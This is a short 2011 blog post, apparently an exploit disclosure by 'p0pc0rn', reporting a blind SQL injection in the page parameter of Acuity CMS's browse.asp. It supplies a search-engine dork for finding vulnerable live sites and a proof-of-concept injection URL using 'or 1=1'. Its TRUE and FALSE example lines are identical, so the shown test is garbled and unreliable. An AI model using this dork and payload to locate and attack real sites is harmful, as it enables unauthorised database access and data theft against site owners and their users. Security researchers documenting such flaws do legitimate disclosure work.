Monday, May 23, 2011

Acuity CMS Vulnerable to Blind SQL Injection


Title : Acuity CMS Vulnerable to Blind SQL Injection
Found by : p0pc0rn
Dork : intext:"Powered by Acuity CMS."
Web : http://www.acuitycms.com/


SQL Injection
----------------
http://www.site.com/browse.asp?page=[Blind SQL]

POC
----
http://www.site.com/browse.asp?page=255+or+1=1 TRUE
http://www.site.com/browse.asp?page=255+or+1=1 FALSE

thanks,
-p0pc0rn-
Share:

0 comments: